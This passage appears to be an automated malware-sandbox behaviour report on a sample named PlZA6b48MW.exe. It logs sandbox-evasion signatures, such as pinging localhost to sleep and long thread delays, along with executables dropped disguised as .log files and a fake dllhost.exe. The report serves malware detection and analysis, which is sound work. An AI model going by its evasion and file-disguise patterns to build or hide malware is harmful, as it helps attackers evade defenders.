                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 760000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1A440000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeMemory allocated: 8B0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeMemory allocated: B80000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeMemory allocated: 1A650000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 10D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1AD90000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1180000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1AE90000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeMemory allocated: 11A0000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeMemory allocated: 1AB40000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeMemory allocated: 10D0000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeMemory allocated: 1ABD0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1340000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1B020000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 16C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1B190000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeMemory allocated: 26F0000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeMemory allocated: 1A920000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 930000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: 1A5D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3043Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2751Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2823Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3025
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3066
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2329
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZwLVNbth.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\YNJEaDTu.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\bTenUpua.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\LARQmQKJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\uWGScrdc.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\kkpLxnoP.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\dZJDzodr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\CwRRQJIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\UqqnPMXK.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\MiiYvNyr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\euKdPjTG.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\nIcTiRiZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\IXnYeTUQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\OeqoqbNM.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\RCSpyiiu.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\mSTLtqAw.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\kAfKNzod.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\FvWYGyIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZBNMMRPs.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\GOnzOWoM.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep count: 3043 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 2751 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep count: 2823 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep count: 3025 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep count: 3066 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 2329 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe TID: 8208Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe TID: 6616Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 7164Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8288Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8296Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8300Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8328Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8280Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8536Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8404Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8828Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8712Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8980Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8856Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
